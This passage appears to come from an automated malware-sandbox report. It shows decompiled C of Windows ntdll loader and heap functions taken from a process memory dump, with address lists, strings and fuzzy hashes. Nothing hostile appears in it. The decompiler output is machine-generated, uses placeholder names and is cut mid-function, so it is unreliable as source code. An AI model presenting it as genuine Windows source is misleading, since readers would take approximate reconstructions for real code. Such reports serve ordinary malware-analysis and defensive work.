							if(_t124 < 0) {
								E009CB1E1(_t124, 0x1490, 0, _v16);
								goto L8;
							}
							goto L14;
						}
					} else {
						goto L8;
					}
				}
			}




















                                                                                                                          0x009d7e4c
                                                                                                                          0x009d7e50
                                                                                                                          0x009d7e55
                                                                                                                          0x009d7e58
                                                                                                                          0x009d7e5d
                                                                                                                          0x009d7e71
                                                                                                                          0x009d7f33
                                                                                                                          0x009d7e77
                                                                                                                          0x009d7e77
                                                                                                                          0x009d7e79
                                                                                                                          0x009d7e79
                                                                                                                          0x009d7e7e
                                                                                                                          0x009d7f45
                                                                                                                          0x00a29848
                                                                                                                          0x00000000
                                                                                                                          0x00a29848
                                                                                                                          0x009d7f4e
                                                                                                                          0x009d7f53
                                                                                                                          0x009d7f5a
                                                                                                                          0x00000000
                                                                                                                          0x00000000
                                                                                                                          0x00a2985a
                                                                                                                          0x00a29862
                                                                                                                          0x00a29866
                                                                                                                          0x00000000
                                                                                                                          0x00a2986c
                                                                                                                          0x00000000
                                                                                                                          0x00a2986c
                                                                                                                          0x009d7e84
                                                                                                                          0x009d7e84
                                                                                                                          0x009d7e8d
                                                                                                                          0x00a29871
                                                                                                                          0x009d7eb8
                                                                                                                          0x009d7ec0
                                                                                                                          0x009d7ec0
                                                                                                                          0x009d7e9a
                                                                                                                          0x00a2987e
                                                                                                                          0x00000000
                                                                                                                          0x00000000
                                                                                                                          0x00a29884
                                                                                                                          0x00a2988b
                                                                                                                          0x00a298a7
                                                                                                                          0x00a298ac
                                                                                                                          0x00a298b1
                                                                                                                          0x00a298b6
                                                                                                                          0x00a298b8
                                                                                                                          0x00a298b8
                                                                                                                          0x00a298b9
                                                                                                                          0x00000000
                                                                                                                          0x00a298b9
                                                                                                                          0x009d7ea0
                                                                                                                          0x009d7ea7
                                                                                                                          0x00000000
                                                                                                                          0x00000000
                                                                                                                          0x009d7eac
                                                                                                                          0x009d7eb1
                                                                                                                          0x009d7ec6
                                                                                                                          0x009d7ed0
                                                                                                                          0x00a298cc
                                                                                                                          0x009d7ed6
                                                                                                                          0x009d7ed6
                                                                                                                          0x009d7ed6
                                                                                                                          0x009d7ede
                                                                                                                          0x009d7ee3
                                                                                                                          0x00a298e3
                                                                                                                          0x00a298f0
                                                                                                                          0x00a29902
                                                                                                                          0x00a298f2
                                                                                                                          0x00a298fb
                                                                                                                          0x00a298fb
                                                                                                                          0x00a29907
                                                                                                                          0x00a2991d
                                                                                                                          0x00a2991d
                                                                                                                          0x00a29907
                                                                                                                          0x00a298e3
                                                                                                                          0x009d7ef0
                                                                                                                          0x009d7f14
                                                                                                                          0x009d7f14
                                                                                                                          0x009d7f1e
                                                                                                                          0x00a29946
                                                                                                                          0x009d7f24
                                                                                                                          0x009d7f24
                                                                                                                          0x009d7f24
                                                                                                                          0x009d7f2c
                                                                                                                          0x00a2996a
                                                                                                                          0x00a29975
                                                                                                                          0x00a29975
                                                                                                                          0x00a2997e
                                                                                                                          0x00a29993
                                                                                                                          0x00a29993
                                                                                                                          0x00a2997e
                                                                                                                          0x00000000
                                                                                                                          0x009d7ef2
                                                                                                                          0x009d7efc
                                                                                                                          0x009d7f0a
                                                                                                                          0x009d7f0e
                                                                                                                          0x00a29933
                                                                                                                          0x00000000
                                                                                                                          0x00a29933
                                                                                                                          0x00000000
                                                                                                                          0x009d7f0e
                                                                                                                          0x00000000
                                                                                                                          0x00000000
                                                                                                                          0x00000000
                                                                                                                          0x009d7eb1

                                                                                                                          Strings
                                                                                                                          • Could not validate the crypto signature for DLL %wZ, xrefs: 00A29891
                                                                                                                          • LdrpCompleteMapModule, xrefs: 00A29898
                                                                                                                          • minkernel\ntdll\ldrmap.c, xrefs: 00A298A2
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000003.00000002.462415723.00000000009A0000.00000040.00000001.sdmp, Offset: 009A0000, based on PE: true
                                                                                                                          Similarity
                                                                                                                          • API ID:
                                                                                                                          • String ID: Could not validate the crypto signature for DLL %wZ$LdrpCompleteMapModule$minkernel\ntdll\ldrmap.c
                                                                                                                          • API String ID: 0-1676968949
                                                                                                                          • Opcode ID: 22708f2e7b783c9828fe53caa928e0477d3431a9e5adb92bcd2dda0ee3d7fcfb
                                                                                                                          • Instruction ID: 45dbbdd640618db7e7eabf9638483dabaebd1671af75ce7519890fc647d7ed17
                                                                                                                          • Opcode Fuzzy Hash: 22708f2e7b783c9828fe53caa928e0477d3431a9e5adb92bcd2dda0ee3d7fcfb
                                                                                                                          • Instruction Fuzzy Hash: 02514531A487449BDB21CBACC944B2ABBE4EF41710F1446AAF8519B3F2E734ED40C7A1
                                                                                                                          Uniqueness

                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                          Function 00A723E3, Relevance: 3.9, Strings: 3, Instructions: 166COMMONCrypto
                                                                                                                          Download Yara Rule
                                                                                                                          C-Code - Quality: 64%
                                                                                                                          			E00A723E3(signed int __ecx, unsigned int __edx) {
				intOrPtr _v8;
				intOrPtr _t42;
				char _t43;
				signed short _t44;
				signed short _t48;
				signed char _t51;
				signed short _t52;
				intOrPtr _t54;
				signed short _t64;
				signed short _t66;
				intOrPtr _t69;
				signed short _t73;
				signed short _t76;
				signed short _t77;
				signed short _t79;
				void* _t83;
				signed int _t84;
				signed int _t85;
				signed char _t94;
				unsigned int _t99;
				unsigned int _t104;
				signed int _t108;
				void* _t110;
				void* _t111;
				unsigned int _t114;

				_t84 = __ecx;
				_push(__ecx);
				_t114 = __edx;
				_t42 =  *((intOrPtr*)(__edx + 7));
				if(_t42 == 1) {
					L49:
					_t43 = 1;
					L50:
					return _t43;
				}
				if(_t42 != 4) {
					if(_t42 >= 0) {
						if( *(__ecx + 0x4c) == 0) {
							_t44 =  *__edx & 0x0000ffff;
						} else {
							_t73 =  *__edx;
							if(( *(__ecx + 0x4c) & _t73) != 0) {
								_t73 = _t73 ^  *(__ecx + 0x50);
							}
							_t44 = _t73 & 0x0000ffff;
						}
					} else {
						_t104 = __edx >> 0x00000003 ^  *__edx ^  *0xab874c ^ __ecx;
						if(_t104 == 0) {
							_t76 =  *((intOrPtr*)(__edx - (_t104 >> 0xd)));
						} else {
							_t76 = 0;
						}
						_t44 =  *((intOrPtr*)(_t76 + 0x14));
					}
					_t94 =  *((intOrPtr*)(_t114 + 7));
					_t108 = _t44 & 0xffff;
					if(_t94 != 5) {
						if((_t94 & 0x00000040) == 0) {
							if((_t94 & 0x0000003f) == 0x3f) {
								if(_t94 >= 0) {
									if( *(_t84 + 0x4c) == 0) {
										_t48 =  *_t114 & 0x0000ffff;
									} else {
										_t66 =  *_t114;
										if(( *(_t84 + 0x4c) & _t66) != 0) {
											_t66 = _t66 ^  *(_t84 + 0x50);
										}
										_t48 = _t66 & 0x0000ffff;
									}
								} else {
									_t99 = _t114 >> 0x00000003 ^  *_t114 ^  *0xab874c ^ _t84;
									if(_t99 == 0) {
										_t69 =  *((intOrPtr*)(_t114 - (_t99 >> 0xd)));
									} else {
										_t69 = 0;
									}
									_t48 =  *((intOrPtr*)(_t69 + 0x14));
								}
								_t85 =  *(_t114 + (_t48 & 0xffff) * 8 - 4);
							} else {
								_t85 = _t94 & 0x3f;
							}
						} else {
							_t85 =  *(_t114 + 4 + (_t94 & 0x3f) * 8) & 0x0000ffff;
						}
					} else {
						_t85 =  *(_t84 + 0x54) & 0x0000ffff ^  *(_t114 + 4) & 0x0000ffff;
					}
					_t110 = (_t108 << 3) - _t85;
				} else {
					if( *(__ecx + 0x4c) == 0) {
						_t77 =  *__edx & 0x0000ffff;
					} else {
						_t79 =  *__edx;
						if(( *(__ecx + 0x4c) & _t79) != 0) {
							_t79 = _t79 ^  *(__ecx + 0x50);
						}
						_t77 = _t79 & 0x0000ffff;
					}
					_t110 =  *((intOrPtr*)(_t114 - 8)) - (_t77 & 0x0000ffff);
				}
				_t51 =  *((intOrPtr*)(_t114 + 7));
				if(_t51 != 5) {
					if((_t51 & 0x00000040) == 0) {
						_t52 = 0;
						goto L42;
					}
					_t64 = _t51 & 0x3f;
					goto L38;
				} else {
					_t64 =  *(_t114 + 6) & 0x000000ff;
					L38:
					_t52 = _t64 << 0x00000003 & 0x0000ffff;
					L42:
					_t35 = _t114 + 8; // -16
					_t111 = _t110 + (_t52 & 0x0000ffff);
					_t83 = _t35 + _t111;
					_t54 = E00A1D4F0(_t83, 0x9a6c58, 8);
					_v8 = _t54;
					if(_t54 == 8) {
						goto L49;
					}
					if( *((intOrPtr*)( *[fs:0x30] + 0xc)) == 0) {
						_push("HEAP: ");
						E009CB150();
					} else {
						E009CB150("HEAP[%wZ]: ",  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x30] + 0xc)) + 0xc)) + 0x2c);
					}
					_push(_t111);
					_push(_v8 + _t83);
					E009CB150("Heap block at %p modified at %p past requested size of %Ix\n", _t114);
					if( *((char*)( *[fs:0x30] + 2)) != 0) {
						 *0xab6378 = 1;
						asm("int3");
						 *0xab6378 = 0;
					}
					_t43 = 0;
					goto L50;
				}
			}




























                                                                                                                          0x00a723e3
                                                                                                                          0x00a723e8
                                                                                                                          0x00a723eb
                                                                                                                          0x00a723ee
                                                                                                                          0x00a723f3
                                                                                                                          0x00a7259b
                                                                                                                          0x00a7259b
                                                                                                                          0x00a7259d
                                                                                                                          0x00a725a3
                                                                                                                          0x00a725a3
                                                                                                                          0x00a723fb
                                                                                                                          0x00a72424
                                                                                                                          0x00a7244f
                                                                                                                          0x00a72460
                                                                                                                          0x00a72451
                                                                                                                          0x00a72451
                                                                                                                          0x00a72456
                                                                                                                          0x00a72458
                                                                                                                          0x00a72458
                                                                                                                          0x00a7245b
                                                                                                                          0x00a7245b
                                                                                                                          0x00a72426
                                                                                                                          0x00a72431
                                                                                                                          0x00a72436
                                                                                                                          0x00a72443
                                                                                                                          0x00a72438
                                                                                                                          0x00a72438
                                                                                                                          0x00a72438
                                                                                                                          0x00a72445
                                                                                                                          0x00a72445
                                                                                                                          0x00a72463
                                                                                                                          0x00a72469
                                                                                                                          0x00a7246f
                                                                                                                          0x00a72480
                                                                                                                          0x00a72495
                                                                                                                          0x00a724a1
                                                                                                                          0x00a724ce
                                                                                                                          0x00a724df
                                                                                                                          0x00a724d0
                                                                                                                          0x00a724d0
                                                                                                                          0x00a724d5
                                                                                                                          0x00a724d7
                                                                                                                          0x00a724d7
                                                                                                                          0x00a724da
                                                                                                                          0x00a724da
                                                                                                                          0x00a724a3
                                                                                                                          0x00a724b0
                                                                                                                          0x00a724b5
                                                                                                                          0x00a724c2
                                                                                                                          0x00a724b7
                                                                                                                          0x00a724b7
                                                                                                                          0x00a724b7
                                                                                                                          0x00a724c4
                                                                                                                          0x00a724c4
                                                                                                                          0x00a724e8
                                                                                                                          0x00a72497
                                                                                                                          0x00a7249a
                                                                                                                          0x00a7249a
                                                                                                                          0x00a72482
                                                                                                                          0x00a72488
                                                                                                                          0x00a72488
                                                                                                                          0x00a72471
                                                                                                                          0x00a72479
                                                                                                                          0x00a72479
                                                                                                                          0x00a724ef
                                                                                                                          0x00a723fd
                                                                                                                          0x00a72401
                                                                                                                          0x00a72412
                                                                                                                          0x00a72403
                                                                                                                          0x00a72403
                                                                                                                          0x00a72408
                                                                                                                          0x00a7240a
                                                                                                                          0x00a7240a
                                                                                                                          0x00a7240d
                                                                                                                          0x00a7240d
                                                                                                                          0x00a7241b
                                                                                                                          0x00a7241b
                                                                                                                          0x00a724f1
                                                                                                                          0x00a724f6
                                                                                                                          0x00a72507
                                                                                                                          0x00a72510
                                                                                                                          0x00000000
                                                                                                                          0x00a72510
                                                                                                                          0x00a7250b
                                                                                                                          0x00000000
                                                                                                                          0x00a724f8
                                                                                                                          0x00a724f8
                                                                                                                          0x00a724fc
                                                                                                                          0x00a72500
                                                                                                                          0x00a72512
                                                                                                                          0x00a72515
                                                                                                                          0x00a7251a
                                                                                                                          0x00a72521
                                                                                                                          0x00a72524
                                                                                                                          0x00a72529
                                                                                                                          0x00a7252f
                                                                                                                          0x00000000
                                                                                                                          0x00000000
                                                                                                                          0x00a7253c
                                                                                                                          0x00a7255c
                                                                                                                          0x00a72561
                                                                                                                          0x00a7253e
                                                                                                                          0x00a72554
                                                                                                                          0x00a72559
                                                                                                                          0x00a7256a
                                                                                                                          0x00a7256d
                                                                                                                          0x00a72574
                                                                                                                          0x00a72586
                                                                                                                          0x00a72588
                                                                                                                          0x00a7258f
                                                                                                                          0x00a72590
                                                                                                                          0x00a72590
                                                                                                                          0x00a72597
                                                                                                                          0x00000000
                                                                                                                          0x00a72597

                                                                                                                          Strings
                                                                                                                          • HEAP[%wZ]: , xrefs: 00A7254F
                                                                                                                          • Heap block at %p modified at %p past requested size of %Ix, xrefs: 00A7256F
                                                                                                                          • HEAP: , xrefs: 00A7255C
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000003.00000002.462415723.00000000009A0000.00000040.00000001.sdmp, Offset: 009A0000, based on PE: true
                                                                                                                          Similarity
                                                                                                                          • API ID:
                                                                                                                          • String ID: HEAP: $HEAP[%wZ]: $Heap block at %p modified at %p past requested size of %Ix
                                                                                                                          • API String ID: 0-3815128232
                                                                                                                          • Opcode ID: a5625c4562ce0b7468ecfcf23a6f9e9fe7b058ecbfa490f7c620fa896da582b2
                                                                                                                          • Instruction ID: 597c9af7529c3a186623dc0d09680eda38b30c95f7b9ad17409249b76328b420
                                                                                                                          • Opcode Fuzzy Hash: a5625c4562ce0b7468ecfcf23a6f9e9fe7b058ecbfa490f7c620fa896da582b2
                                                                                                                          • Instruction Fuzzy Hash: 255124341002608AE374CF2ECC5577277F5EB88745F68C899E8CA8B282D639D847EB60
                                                                                                                          Uniqueness

                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                          Function 009CE620, Relevance: 3.9, Strings: 3, Instructions: 165COMMON
                                                                                                                          Download Yara Rule
                                                                                                                          C-Code - Quality: 93%
                                                                                                                          			E009CE620(void* __ecx, short* __edx, short* _a4) {
				char _v16;
				char _v20;
				intOrPtr _v24;
				char* _v28;
				char _v32;
				char _v36;
				char _v44;
				signed int _v48;
				intOrPtr _v52;
				void* _v56;
				void* _v60;
				char _v64;
				void* _v68;
				void* _v76;
				void* _v84;
				signed int _t59;
				signed int _t74;
				signed short* _t75;
				signed int _t76;
				signed short* _t78;
				signed int _t83;
				short* _t93;
				signed short* _t94;
				short* _t96;
				void* _t97;
				signed int _t99;
				void* _t101;
				void* _t102;

				_t80 = __ecx;
				_t101 = (_t99 & 0xfffffff8) - 0x34;
				_t96 = __edx;
				_v44 = __edx;
				_t78 = 0;
				_v56 = 0;
				if(__ecx == 0 || __edx == 0) {
					L28:
					_t97 = 0xc000000d;
				} else {
					_t93 = _a4;
					if(_t93 == 0) {
						goto L28;
					}
					_t78 = E009CF358(__ecx, 0xac);
					if(_t78 == 0) {
						_t97 = 0xc0000017;
						L6:
						if(_v56 != 0) {
							_push(_v56);
							E00A095D0();
						}
						if(_t78 != 0) {
							L009E77F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t78);
						}
						return _t97;
					}
					E00A0FA60(_t78, 0, 0x158);
					_v48 = _v48 & 0x00000000;
					_t102 = _t101 + 0xc;
					 *_t96 = 0;
					 *_t93 = 0;
					E00A0BB40(_t80,  &_v36, L"\\Registry\\Machine\\System\\CurrentControlSet\\Control\\NLS\\Language");
					_v36 = 0x18;
					_v28 =  &_v44;
					_v64 = 0;
					_push( &_v36);
					_push(0x20019);
					_v32 = 0;
					_push( &_v64);
					_v24 = 0x40;
					_v20 = 0;
					_v16 = 0;
					_t97 = E00A09600();
					if(_t97 < 0) {
						goto L6;
					}
					E00A0BB40(0,  &_v36, L"InstallLanguageFallback");
					_push(0);
					_v48 = 4;
					_t97 = L009CF018(_v64,  &_v44,  &_v56, _t78,  &_v48);
					if(_t97 >= 0) {
						if(_v52 != 1) {
							L17:
							_t97 = 0xc0000001;
							goto L6;
						}
						_t59 =  *_t78 & 0x0000ffff;
						_t94 = _t78;
						_t83 = _t59;
						if(_t59 == 0) {
							L19:
							if(_t83 == 0) {
								L23:
								E00A0BB40(_t83, _t102 + 0x24, _t78);
								if(L009D43C0( &_v48,  &_v64) == 0) {
									goto L17;
								}
								_t84 = _v48;
								 *_v48 = _v56;
								if( *_t94 != 0) {
									E00A0BB40(_t84, _t102 + 0x24, _t94);
									if(L009D43C0( &_v48,  &_v64) != 0) {
										 *_a4 = _v56;
									} else {
										_t97 = 0xc0000001;
										 *_v48 = 0;
									}
								}
								goto L6;
							}
							_t83 = _t83 & 0x0000ffff;
							while(_t83 == 0x20) {
								_t94 =  &(_t94[1]);
								_t74 =  *_t94 & 0x0000ffff;
								_t83 = _t74;
								if(_t74 != 0) {
									continue;
								}
								goto L23;
							}
							goto L23;
						} else {
							goto L14;
						}
						while(1) {
							L14:
							_t27 =  &(_t94[1]); // 0x2
							_t75 = _t27;
							if(_t83 == 0x2c) {
								break;
							}
							_t94 = _t75;
							_t76 =  *_t94 & 0x0000ffff;
							_t83 = _t76;
							if(_t76 != 0) {
								continue;
							}
							goto L23;
						}
						 *_t94 = 0;
						_t94 = _t75;
						_t83 =  *_t75 & 0x0000ffff;
						goto L19;
					}
				}
			}































                                                                                                                          0x009ce620
                                                                                                                          0x009ce628
                                                                                                                          0x009ce62f
                                                                                                                          0x009ce631
                                                                                                                          0x009ce635
                                                                                                                          0x009ce637
                                                                                                                          0x009ce63e
                                                                                                                          0x00a25503
                                                                                                                          0x00a25503
                                                                                                                          0x009ce64c
                                                                                                                          0x009ce64c
                                                                                                                          0x009ce651
                                                                                                                          0x00000000
                                                                                                                          0x00000000
                                                                                                                          0x009ce661
                                                                                                                          0x009ce665
                                                                                                                          0x00a2542a
                                                                                                                          0x009ce715
                                                                                                                          0x009ce71a
                                                                                                                          0x009ce71c
                                                                                                                          0x009ce720
                                                                                                                          0x009ce720
                                                                                                                          0x009ce727
                                                                                                                          0x009ce736
                                                                                                                          0x009ce736
                                                                                                                          0x009ce743
                                                                                                                          0x009ce743
                                                                                                                          0x009ce673
                                                                                                                          0x009ce678
                                                                                                                          0x009ce67d
                                                                                                                          0x009ce682
                                                                                                                          0x009ce685
                                                                                                                          0x009ce692
                                                                                                                          0x009ce69b
                                                                                                                          0x009ce6a3
                                                                                                                          0x009ce6ad
                                                                                                                          0x009ce6b1
                                                                                                                          0x009ce6b2
                                                                                                                          0x009ce6bb
                                                                                                                          0x009ce6bf
                                                                                                                          0x009ce6c0
                                                                                                                          0x009ce6c8
                                                                                                                          0x009ce6cc
                                                                                                                          0x009ce6d5
                                                                                                                          0x009ce6d9
                                                                                                                          0x00000000
                                                                                                                          0x00000000
                                                                                                                          0x009ce6e5
                                                                                                                          0x009ce6ea
                                                                                                                          0x009ce6f9
                                                                                                                          0x009ce70b
                                                                                                                          0x009ce70f
                                                                                                                          0x00a25439
                                                                                                                          0x00a2545e
                                                                                                                          0x00a2545e
                                                                                                                          0x00000000
                                                                                                                          0x00a2545e
                                                                                                                          0x00a2543b
                                                                                                                          0x00a2543e
                                                                                                                          0x00a25440
                                                                                                                          0x00a25445
                                                                                                                          0x00a25472
                                                                                                                          0x00a25475
                                                                                                                          0x00a2548d
                                                                                                                          0x00a25493
                                                                                                                          0x00a254a9
                                                                                                                          0x00000000
                                                                                                                          0x00000000
                                                                                                                          0x00a254ab
                                                                                                                          0x00a254b4
                                                                                                                          0x00a254bc
                                                                                                                          0x00a254c8
                                                                                                                          0x00a254de
                                                                                                                          0x00a254fb
                                                                                                                          0x00a254e0
                                                                                                                          0x00a254e6
                                                                                                                          0x00a254eb
                                                                                                                          0x00a254eb
                                                                                                                          0x00a254de
                                                                                                                          0x00000000
                                                                                                                          0x00a254bc
                                                                                                                          0x00a25477
                                                                                                                          0x00a2547a
                                                                                                                          0x00a25480
                                                                                                                          0x00a25483
                                                                                                                          0x00a25486
                                                                                                                          0x00a2548b
                                                                                                                          0x00000000
                                                                                                                          0x00000000
                                                                                                                          0x00000000
                                                                                                                          0x00a2548b
                                                                                                                          0x00000000
                                                                                                                          0x00000000
                                                                                                                          0x00000000
                                                                                                                          0x00000000
                                                                                                                          0x00a25447
                                                                                                                          0x00a25447
                                                                                                                          0x00a25447
                                                                                                                          0x00a25447
                                                                                                                          0x00a2544e
                                                                                                                          0x00000000
                                                                                                                          0x00000000
                                                                                                                          0x00a25450
                                                                                                                          0x00a25452
                                                                                                                          0x00a25455
                                                                                                                          0x00a2545a
                                                                                                                          0x00000000
                                                                                                                          0x00000000
                                                                                                                          0x00000000
                                                                                                                          0x00a2545c
                                                                                                                          0x00a2546a
                                                                                                                          0x00a2546d
                                                                                                                          0x00a2546f
                                                                                                                          0x00000000
                                                                                                                          0x00a2546f
                                                                                                                          0x009ce70f

                                                                                                                          Strings
                                                                                                                          • \Registry\Machine\System\CurrentControlSet\Control\NLS\Language, xrefs: 009CE68C
                                                                                                                          • @, xrefs: 009CE6C0
                                                                                                                          • InstallLanguageFallback, xrefs: 009CE6DB
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000003.00000002.462415723.00000000009A0000.00000040.00000001.sdmp, Offset: 009A0000, based on PE: true
                                                                                                                          Similarity
                                                                                                                          • API ID:
                                                                                                                          • String ID: @$InstallLanguageFallback$\Registry\Machine\System\CurrentControlSet\Control\NLS\Language
                                                                                                                          • API String ID: 0-1757540487
                                                                                                                          • Opcode ID: f5ac120303488ae55e7f4875f38d3ec667b3c41985012310b4c9c3d606eec20c
                                                                                                                          • Instruction ID: 2e3474d36dcb7f916bb6192af6390b71faa52f87a9cc165b0019debd2a269b0a
                                                                                                                          • Opcode Fuzzy Hash: f5ac120303488ae55e7f4875f38d3ec667b3c41985012310b4c9c3d606eec20c
                                                                                                                          • Instruction Fuzzy Hash: FE518D769183559BC714EF68D440BABB3E9BF88714F05093EF989E7240E734DD4487A2
                                                                                                                          Uniqueness

                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                          Function 009EB8E4, Relevance: 3.8, Strings: 3, Instructions: 69COMMON
                                                                                                                          Download Yara Rule
                                                                                                                          C-Code - Quality: 60%
                                                                                                                          			E009EB8E4(unsigned int __edx) {
				void* __ecx;
				void* __edi;
				intOrPtr* _t16;
				intOrPtr _t18;
				void* _t27;
				void* _t28;
				unsigned int _t30;
				intOrPtr* _t31;
				unsigned int _t38;
				void* _t39;
				unsigned int _t40;

				_t40 = __edx;
				_t39 = _t28;
				if( *0xab8748 >= 1) {
					__eflags = (__edx + 0x00000fff & 0xfffff000) - __edx;
					if((__edx + 0x00000fff & 0xfffff000) != __edx) {
						_t18 =  *[fs:0x30];
						__eflags =  *(_t18 + 0xc);
						if( *(_t18 + 0xc) == 0) {
							_push("HEAP: ");
							E009CB150();
						} else {
							E009CB150("HEAP[%wZ]: ",  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x30] + 0xc)) + 0xc)) + 0x2c);
						}
						_push("(ROUND_UP_TO_POWER2(Size, PAGE_SIZE) == Size)");
						E009CB150();
						__eflags =  *0xab7bc8;
						if(__eflags == 0) {
							E00A82073(_t27, 1, _t39, __eflags);
						}
					}
				}
				_t38 =  *(_t39 + 0xb8);
				if(_t38 != 0) {
					_t13 = _t40 >> 0xc;
					__eflags = _t13;
					while(1) {
						__eflags = _t13 -  *((intOrPtr*)(_t38 + 4));
						if(_t13 <  *((intOrPtr*)(_t38 + 4))) {
							break;
						}
						_t30 =  *_t38;
						__eflags = _t30;
						if(_t30 != 0) {
							_t38 = _t30;
							continue;
						}
						_t13 =  *((intOrPtr*)(_t38 + 4)) - 1;
						__eflags =  *((intOrPtr*)(_t38 + 4)) - 1;
						break;
					}
					return E009EAB40(_t39, _t38, 0, _t13, _t40);
				} else {
					_t31 = _t39 + 0x8c;
					_t16 =  *_t31;
					while(_t31 != _t16) {
						__eflags =  *((intOrPtr*)(_t16 + 0x14)) - _t40;
						if( *((intOrPtr*)(_t16 + 0x14)) >= _t40) {
							return _t16;
						}
						_t16 =  *_t16;
					}
					return _t31;
				}
			}














                                                                                                                          0x009eb8f0
                                                                                                                          0x009eb8f2
                                                                                                                          0x009eb8f4
                                                                                                                          0x00a32c4e
                                                                                                                          0x00a32c50
                                                                                                                          0x00a32c56
                                                                                                                          0x00a32c5c
                                                                                                                          0x00a32c60
                                                                                                                          0x00a32c7f
                                                                                                                          0x00a32c84
                                                                                                                          0x00a32c62
                                                                                                                          0x00a32c77
                                                                                                                          0x00a32c7c
                                                                                                                          0x00a32c8a
                                                                                                                          0x00a32c8f
                                                                                                                          0x00a32c94
                                                                                                                          0x00a32c9c
                                                                                                                          0x00a32ca5
                                                                                                                          0x00a32ca5
                                                                                                                          0x00a32c9c
                                                                                                                          0x00a32c50
                                                                                                                          0x009eb8fa
                                                                                                                          0x009eb902
                                                                                                                          0x009eb921
                                                                                                                          0x009eb921
                                                                                                                          0x009eb924
                                                                                                                          0x009eb924
                                                                                                                          0x009eb927
                                                                                                                          0x00000000
                                                                                                                          0x00000000
                                                                                                                          0x009eb929
                                                                                                                          0x009eb92b
                                                                                                                          0x009eb92d
                                                                                                                          0x009eb940
                                                                                                                          0x00000000
                                                                                                                          0x009eb940
                                                                                                                          0x009eb932
                                                                                                                          0x009eb932
                                                                                                                          0x00000000
                                                                                                                          0x009eb932
                                                                                                                          0x00000000
                                                                                                                          0x009eb904
                                                                                                                          0x009eb904
                                                                                                                          0x009eb90a
                                                                                                                          0x009eb90c
                                                                                                                          0x009eb916
                                                                                                                          0x009eb919
                                                                                                                          0x009eb915
                                                                                                                          0x009eb915
                                                                                                                          0x009eb91b
                                                                                                                          0x009eb91b
                                                                                                                          0x00000000
                                                                                                                          0x009eb910

                                                                                                                          Strings
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000003.00000002.462415723.00000000009A0000.00000040.00000001.sdmp, Offset: 009A0000, based on PE: true
                                                                                                                          Similarity
                                                                                                                          • API ID:
                                                                                                                          • String ID: (ROUND_UP_TO_POWER2(Size, PAGE_SIZE) == Size)$HEAP: $HEAP[%wZ]:
                                                                                                                          • API String ID: 0-2558761708
                                                                                                                          • Opcode ID: c0c7a033180637aadfc708f2cf88e0306db6ec3d52cdd8c7cdbfc507ef65af11
                                                                                                                          • Instruction ID: 36c42ebba69f18db061ca0e9c65926e0ea715168a8bc3856f15387a4789f1d49
                                                                                                                          • Opcode Fuzzy Hash: c0c7a033180637aadfc708f2cf88e0306db6ec3d52cdd8c7cdbfc507ef65af11
                                                                                                                          • Instruction Fuzzy Hash: 9111B1317041419FD71ADB1AC495B3AB3A9EB80728F298129F14ACB252DB34DC44D781
                                                                                                                          Uniqueness

                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                          Function 009DD5E0, Relevance: 2.9, Strings: 2, Instructions: 353COMMONCrypto
                                                                                                                          Download Yara Rule
                                                                                                                          C-Code - Quality: 87%
                                                                                                                          			E009DD5E0(signed int _a4, signed int _a8, signed int _a12, intOrPtr* _a16, signed int _a20, signed int _a24) {
				signed int _v8;
				intOrPtr _v20;
				signed int _v36;
				intOrPtr* _v40;
				signed int _v44;
				signed int _v48;
				signed char _v52;
				signed int _v60;
				signed int _v64;
				signed int _v68;
				signed int _v72;
				signed int _v76;
				intOrPtr _v80;
				signed int _v84;
				intOrPtr _v100;
				intOrPtr _v104;
				signed int _v108;
				signed int _v112;
				signed int _v116;
				intOrPtr _v120;
				signed int _v132;
				char _v140;
				char _v144;
				char _v157;
				signed int _v164;
				signed int _v168;
				signed int _v169;
				intOrPtr _v176;
				signed int _v180;
				signed int _v184;
				intOrPtr _v188;
				signed int _v192;
				signed int _v200;
				signed int _v208;
				intOrPtr* _v212;
				char _v216;
				void* __ebx;
				void* __edi;
				void* __esi;
				void* __ebp;
				signed int _t204;
				void* _t208;
				signed int _t211;
				signed int _t216;
				intOrPtr _t217;
				intOrPtr* _t218;
				signed int _t226;
				signed int _t239;
				signed int* _t247;
				signed int _t249;
				void* _t252;
				signed int _t256;
				signed int _t269;
				signed int _t271;
				signed int _t277;
				signed int _t279;
				intOrPtr _t283;
				signed int _t287;
				signed int _t288;
				void* _t289;
				signed char _t290;
				signed int _t292;
				signed int* _t293;
				signed int _t306;
				signed int _t307;
				signed int _t308;
				signed int _t309;
				signed int _t310;
				intOrPtr _t311;
				intOrPtr _t312;
				signed int _t319;
				signed int _t320;
				signed int* _t324;
				signed int _t337;
				signed int _t338;
				signed int _t339;
				signed int* _t340;
				void* _t341;
				signed int _t344;
				signed int _t348;
				signed int _t349;
				signed int _t351;
				intOrPtr _t353;
				void* _t354;
				signed int _t356;
				signed int _t358;
				intOrPtr _t359;
				signed int _t363;
				signed short* _t365;
				void* _t367;
				intOrPtr _t369;
				void* _t370;
				signed int _t371;
				signed int _t372;
				void* _t374;
				signed int _t376;
				void* _t384;
				signed int _t387;

				_v8 =  *0xabd360 ^ _t376;
				_t2 =  &_a20;
				 *_t2 = _a20 & 0x00000001;
				_t287 = _a4;
				_v200 = _a12;
				_t365 = _a8;
				_v212 = _a16;
				_v180 = _a24;
				_v168 = 0;
				_v157 = 0;
				if( *_t2 != 0) {
					__eflags = E009D6600(0xab52d8);
					if(__eflags == 0) {
						goto L1;
					} else {
						_v188 = 6;
					}
				} else {
					L1:
					_v188 = 9;
				}
				if(_t365 == 0) {
					_v164 = 0;
					goto L5;
				} else {
					_t363 =  *_t365 & 0x0000ffff;
					_t341 = _t363 + 1;
					if((_t365[1] & 0x0000ffff) < _t341) {
						L109:
						__eflags = _t341 - 0x80;
						if(_t341 <= 0x80) {
							_t281 =  &_v140;
							_v164 =  &_v140;
							goto L114;
						} else {
							_t283 =  *0xab7b9c; // 0x0
							_t281 = L009E4620(_t341,  *((intOrPtr*)( *[fs:0x30] + 0x18)), _t283 + 0x180000, _t341);
							_v164 = _t281;
